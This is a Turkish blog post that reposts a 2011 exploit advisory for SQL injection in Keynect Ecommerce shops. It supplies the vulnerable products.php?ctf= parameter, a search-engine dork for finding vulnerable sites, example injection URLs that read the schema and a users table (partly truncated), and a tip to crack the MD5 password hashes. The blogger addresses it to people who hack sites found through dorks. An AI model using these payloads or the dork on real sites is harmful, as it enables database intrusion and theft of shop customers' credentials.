Keynect ecommerce sQL inj. Exploit

11 03 2011

/.Sa

Uzun zamandır exp paylaşımı yapmadım, ne kadar uzunsa artık bilmiyorum : ) DDZ `de exp kategorisinde gözüme çarptı sizlere ulaştırmak istedim. Bu aralar malumunuz yaygında bir açık.

Keynect Ecommerce SQL Injection Vulnerability


 ======================================================================================== 
 | # Title    : SQL Injection Keynect Ecommerce                                         | 
 | # Author   : Arturo Zamora                                                           | 
 | # email    : Arturo_zamora_c@hotmail.com | 
 | # DAte     : 10/03/2011                                                              | 
 | # Verified : yes                                                                     | 
 | # Risk     : High                                                                    | 
 | # Published:                                                                         | 
 | # Script   : Powered by Keynect Ecommerce SHop http://www.keynect.co.uk/ | 
 | # Dork     : inurl:products.php?ctf=                                                 | 
 | # Tested on: Windows Xp                                                              | 
 ======================         zeux0r 2011             ================================= 
 Exploit  : 
 ======================  

http://localhost.com//products.php?ctf={sqli}

 ======================  
 example: 
 ====================== 

http://localhost.com/products.php?ct...chema.tables--


http://localhost.com/products.php?ct...,42+from+users


 ======================  
 Information : 
 ======================  

 password decrypt md5 

 ======================  

 I Love U Pumosita 

 ================================   Mexican shotos  ======================================== 
 Greetz : all my friend * zer0-zo0rg * Bucio * Klanx * Xoxonaizer * GothicX * Duuf * Murder etc

Bir arkadaş exp hakkında düşüncelerini paylaşmış, kullanan arkadaşlara bunuda ulaştırmak isterim.

Bug Yeni Bulunmus Fakat İslem Sonucuna Gidebilme Orani Cok Zor 
Sunucu  Cevap Vermemektedir Arkadaslar , 
Dork Sayesinde Hack Yapan Arkadaslar  Duyrulur.

Vesselam.. : )

« »


İşlemler

Bilgi

Bir cevap

21 03 2011
fiskos.tk (14:57:29) :

güzel

Cevapla

Yorum yapın

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Değiştir )

Twitter picture

You are commenting using your Twitter account. Log Out / Değiştir )

Facebook photo

You are commenting using your Facebook account. Log Out / Değiştir )

Vazgeç

Connecting to %s


Takip Et

Get every new post delivered to your Inbox.